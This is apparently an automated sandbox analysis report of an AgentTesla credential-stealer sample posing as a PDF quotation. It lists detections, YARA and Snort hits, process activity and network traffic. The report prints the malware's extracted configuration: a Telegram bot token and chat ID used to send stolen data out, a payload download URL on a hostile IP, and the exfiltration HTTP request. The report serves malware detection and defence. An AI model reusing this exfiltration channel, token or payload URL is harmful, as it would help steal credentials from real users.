Edit tour

Windows Analysis Report
Quotation-pdf______________________________________.exe

Overview

General Information

Sample Name:	Quotation-pdf______________________________________.exe
Analysis ID:	613130
MD5:	1fdfcda080bbf2130036ffd1209cfdc8
SHA1:	635cd09d48013f791b56809c9078c318361cbd66
SHA256:	c0cffde9e8ebbcf8118a7d94c1c0d2979ad9401a8f71f4ba926d988043787627
Tags:	agentteslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: Suspicious Double Extension

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Antivirus detection for URL or domain

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Quotation-pdf______________________________________.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe" MD5: 1FDFCDA080BBF2130036FFD1209CFDC8)

Quotation-pdf______________________________________.exe (PID: 5224 cmdline: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe MD5: 1FDFCDA080BBF2130036FFD1209CFDC8)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1513972286", "Chat URL": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quotation-pdf______________________________________.exe PID: 4400	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
4.0.Quotation-pdf______________________________________.exe.400000.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.10.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.10.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x5ac62:$s10: logins 0x5a6c9:$s11: credential 0x56c1b:$g1: get_Clipboard 0x56c29:$g2: get_Keyboard 0x56c36:$g3: get_Password 0x57f17:$g4: get_CtrlKeyDown 0x57f27:$g5: get_ShiftKeyDown 0x57f38:$g6: get_AltKeyDown
4.0.Quotation-pdf______________________________________.exe.400000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.8.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.8.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
4.2.Quotation-pdf______________________________________.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.Quotation-pdf______________________________________.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.Quotation-pdf______________________________________.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
4.0.Quotation-pdf______________________________________.exe.400000.12.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.12.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.12.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e42:$s10: logins 0x308a9:$s11: credential 0x2cdfb:$g1: get_Clipboard 0x2ce09:$g2: get_Keyboard 0x2ce16:$g3: get_Password 0x2e0f7:$g4: get_CtrlKeyDown 0x2e107:$g5: get_ShiftKeyDown 0x2e118:$g6: get_AltKeyDown
4.0.Quotation-pdf______________________________________.exe.400000.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.6.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.6.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e42:$s10: logins 0x308a9:$s11: credential 0x2cdfb:$g1: get_Clipboard 0x2ce09:$g2: get_Keyboard 0x2ce16:$g3: get_Password 0x2e0f7:$g4: get_CtrlKeyDown 0x2e107:$g5: get_ShiftKeyDown 0x2e118:$g6: get_AltKeyDown
4.0.Quotation-pdf______________________________________.exe.400000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.0.Quotation-pdf______________________________________.exe.400000.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c42:$s10: logins 0x326a9:$s11: credential 0x2ebfb:$g1: get_Clipboard 0x2ec09:$g2: get_Keyboard 0x2ec16:$g3: get_Password 0x2fef7:$g4: get_CtrlKeyDown 0x2ff07:$g5: get_ShiftKeyDown 0x2ff18:$g6: get_AltKeyDown
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension

Source: Process started

Author: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, NewProcessName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, OriginalFileName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe" , ParentImage: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentProcessId: 4400, ParentProcessName: Quotation-pdf______________________________________.exe, ProcessCommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ProcessId: 5224, ProcessName: Quotation-pdf______________________________________.exe

Source: Process started

Author: frack113: Data: Command: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, NewProcessName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, OriginalFileName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe" , ParentImage: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentProcessId: 4400, ParentProcessName: Quotation-pdf______________________________________.exe, ProcessCommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ProcessId: 5224, ProcessName: Quotation-pdf______________________________________.exe

Snort Signatures

ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) - Source IP: 45.137.22.163 - Destination IP: 192.168.2.4

Timestamp:	04/21/22-14:20:41.377204 04/21/22-14:20:41.377204
SID:	2848901
Source Port:	80
Destination Port:	49760
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Maldoc Activity (set) - Source IP: 192.168.2.4 - Destination IP: 45.137.22.163

Timestamp:	04/21/22-14:20:40.666385 04/21/22-14:20:40.666385
SID:	2034631
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1513972286", "Chat URL": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument"}
Source: Quotation-pdf______________________________________.exe.5224.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Quotation-pdf______________________________________.exe	Virustotal: Detection: 20%			Perma Link
Source: Quotation-pdf______________________________________.exe	ReversingLabs: Detection: 21%

Antivirus detection for URL or domain

Source: http://45.137.22.163/Toscgshw_Yvmodcuo.png

Avira URL Cloud: Label: malware

Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack	Avira: Label: TR/Spy.Gen8
Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack	Avira: Label: TR/Spy.Gen8
Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack	Avira: Label: TR/Spy.Gen8
Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack	Avira: Label: TR/Spy.Gen8

Source: Quotation-pdf______________________________________.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: Quotation-pdf______________________________________.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49760 -> 45.137.22.163:80
Source: Traffic	Snort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 45.137.22.163:80 -> 192.168.2.4:49760

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da23a512591670Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Toscgshw_Yvmodcuo.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 45.137.22.163 45.137.22.163

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163

Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276366893.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.163
Source: Quotation-pdf______________________________________.exe	String found in binary or memory: http://45.137.22.163/Toscgshw_Yvmodcuo.png
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497285521.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494764319.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276366893.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497197640.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x0Ts8Otn2kD3drlhC.net
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zBjoDx.com
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
